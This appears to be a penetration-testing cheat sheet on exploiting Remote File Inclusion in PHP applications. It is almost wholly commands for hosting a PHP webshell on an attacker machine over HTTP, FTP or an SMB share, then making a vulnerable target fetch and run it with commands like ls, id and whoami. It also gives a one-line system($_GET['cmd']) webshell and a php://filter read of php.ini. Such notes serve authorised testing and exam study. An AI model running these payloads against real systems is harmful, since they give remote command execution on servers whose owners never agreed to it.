Remote File Inclusion

### Intro - *RFI*s can be discovered using the same techniques covered in *Directory Traversal* and *LFI* - *RFI*s are less common than *LFI*s since the target system must be configured in a specific way. - *allow_url_include* option needs to be enabled to leverage RFI, just as with the `data://` wrapper from the *LFI* - While *LFI*s can be used to include local files, *RFI*s allow us to include files from a remote system over *HTTP* or *SMB*. ### PHP Webshells - `/usr/share/webshells/php` ### Exploit - To leverage an *RFI*, we need to make the remote file accessible by the target system. ```bash # web server running with /usr/share/webshells as its current directory kali@kali:/usr/share/webshells/php/$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... # curl to include the hosted file via HTTP curl "http://example.com/wook/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls" ``` ### Verify RFI ```bash http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini echo '<base64>' | base64 -d | grep allow_url_include ``` ```bash /index.php?language=http://127.0.0.1:80/index.php ``` ### HTTP + PHP ```bash <?php phpinfo(); ?> <?php system('whoami'); ?> <?php system($_GET['cmd']); ?> cat << EOF > shell.php <?php system($_GET['cmd']); ?> EOF ``` ### FTP ```bash sudo python -m pyftpdlib -p 21 ftp://<IP>/shell.php&cmd=id # if the server requires valid authentication curl '.../index.php?language=ftp://user:pass@localhost/shell.php?cmd=id' ``` ### Samba SMB server > RFI if the vulnerable web application is hosted on a Windows server, we don't need the `allow_url_include` setting to be enabled for RFI exploit because we can utilize SMB for the RFI. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path. ##### 1 ```bash impacket-smbserver -smb2support share $(pwd) /index.php?language=\\<IP>\share\shell.php&cmd=whoami ``` ##### 2 ```bash [wook] path = /home/kali/wook writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody ``` ```bash # change the directory and run the commands cd /home/kali/wook chmod 0555 /home/kali/wook sudo chown -R nobody:nogroup /home/kali/wook ``` ```bash sudo service smbd restart ``` ```bash # check if our server is running smbmap -H <my_IP> ```